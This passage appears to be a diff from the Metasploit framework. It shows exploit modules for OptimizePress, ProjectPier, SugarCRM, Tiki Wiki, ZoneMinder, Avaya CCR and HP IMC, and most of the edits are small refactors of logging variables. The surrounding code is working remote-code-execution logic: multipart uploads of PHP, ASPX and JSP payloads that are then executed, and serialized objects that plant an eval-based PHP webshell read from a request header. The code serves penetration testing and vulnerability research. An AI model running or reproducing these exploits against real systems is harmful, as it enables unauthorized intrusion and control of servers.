res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
#get upload filepath
print_status("#{peer} - Getting the upload path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
file_path = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
#set cookie
cookie = res.get_cookies
filename = rand_text_alphanumeric(8) + ".php"
#upload payload
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"")
post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
print_status("#{peer} - Uploading PHP payload...")
n_data = post_data.to_s
n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
'data' => n_data,
'headers' => {
'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
end
print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
#get path to payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
payload_url = ""
if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> <span/
payload_url =$1
else
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
end
begin
u = URI(payload_url)
rescue ::URI::InvalidURIError
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
end
register_files_for_cleanup(File::basename(u.path))
print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => u.path
})
end
end

10
modules/exploits/unix/webapp/projectpier_upload_exec.rb
View File

@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
if res and res.code == 404
print_error("#{@peer} - The upload most likely failed")
print_error("#{peer} - The upload most likely failed")
return
end
@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload(:unlink_self=>true)
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
res = upload_php(base, php_fname, p, folder_name)
if not res
print_error("#{@peer} - No response from server")
print_error("#{peer} - No response from server")
return
end
print_status("#{@peer} - Executing '#{php_fname}'...")
print_status("#{peer} - Executing '#{php_fname}'...")
exec_php(base, res)
end
end

21
modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
View File

@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
f = "pathCache.php"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{f}")
print_warning("#{peer} - Deleting #{f}")
client.fs.file.rm(f)
print_good("#{@peer} - #{f} removed to stay ninja")
print_good("#{peer} - #{f} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = normalize_uri(target_uri.path)
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME']
password = datastore['PASSWORD']
@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return
end
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
session_id = $1
else
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
return
end
print_status("#{@peer} - Login successful with #{username}:#{password}")
print_status("#{peer} - Login successful with #{username}:#{password}")
data = "module=Contacts&"
data << "Contacts2_CONTACT_offset=1&"
@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
print_status("#{@peer} - Exploiting the unserialize()")
print_status("#{peer} - Exploiting the unserialize()")
res = send_request_cgi(
{
@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}")
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
print_status("#{@peer} - Executing the payload")
print_status("#{peer} - Executing the payload")
res = send_request_cgi(
{
@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end

19
modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
View File

@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Deleting #{@upload_php}")
print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue
print_error("#{@peer} - Unable to remove #{f}")
print_error("#{peer} - Unable to remove #{f}")
end
end
end
@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
res = send_request_cgi(
'uri' => normalize_uri(base, "tiki-rss_error.php")
@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
return
else
tiki_path = $1
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
end
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
return
end
print_status("#{@peer} - Executing the payload #{@upload_php}")
print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_cgi(
{
@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res
print_error("#{@peer} - Payload execution failed: #{res.code}")
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end

18
modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
View File

@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
command = Rex::Text.uri_encode(payload.encoded)
# login
print_status("#{@peer} - Authenticating as user '#{user}'")
print_status("#{peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{data}",
})
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
print_good("#{@peer} - Authenticated successfully")
print_good("#{peer} - Authenticated successfully")
# send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)")
print_status("#{peer} - Sending payload (#{command.length} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "#{cookie}"
})
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end

2
modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
'Description' => %q{
This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order

2
modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
View File

@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}],
['Windows XP SP3 with Office Standard 2010', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement

23
modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
View File

@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin
print_warning("#{@peer} - Removing #{@payload_path}")
print_warning("#{peer} - Removing #{@payload_path}")
cli.fs.file.rm(@payload_path)
print_good("#{@peer} - #{@payload_path} deleted")
print_good("#{peer} - #{@payload_path} deleted")
rescue ::Exception => e
print_error("Unable to delete #{@payload_path}: #{e.message}")
end
@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
# Generate the ASPX containing the EXE containing the payload
exe = generate_payload_exe
aspx = Msf::Util::EXE.to_exe_aspx(exe)
@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD
#
attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
res = send_request_cgi({
'uri' => attack_url,
@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = ""
@payload_path = ""
if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
print_good("#{@peer} - Payload uploaded successfuly")
print_good("#{peer} - Payload uploaded successfuly")
else
print_error("#{@peer} - Payload upload failed")
print_error("#{peer} - Payload upload failed")
return
end
@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
@payload_path = $1
print_status("#{@peer} - Payload stored on #{@payload_path}")
print_status("#{peer} - Payload stored on #{@payload_path}")
else
print_error("#{@peer} - The payload file path couldn't be retrieved")
print_error("#{peer} - The payload file path couldn't be retrieved")
end
if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
payload_url = URI($1).path
else
print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!")
print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
return
end
@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# EXECUTE
#
print_status("#{@peer} - Executing #{payload_url}...")
print_status("#{peer} - Executing #{payload_url}...")
res = send_request_cgi({
'uri' => payload_url,
@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 20)
if (!res or (res and res.code != 200))
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
return
end

10
modules/exploits/windows/http/hp_imc_mibfileupload.rb
View File

@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
# New lines are handled on the vuln app and payload is corrupted
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
print_status("#{@peer} - Uploading the JSP payload...")
print_status("#{peer} - Uploading the JSP payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
'method' => 'POST',
@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body.empty?
print_status("#{@peer} - JSP payload uploaded successfully")
print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup(jsp_name)
else
fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed")
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
print_status("#{@peer} - Executing payload...")
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'

Some files were not shown because too many files have changed in this diff Show More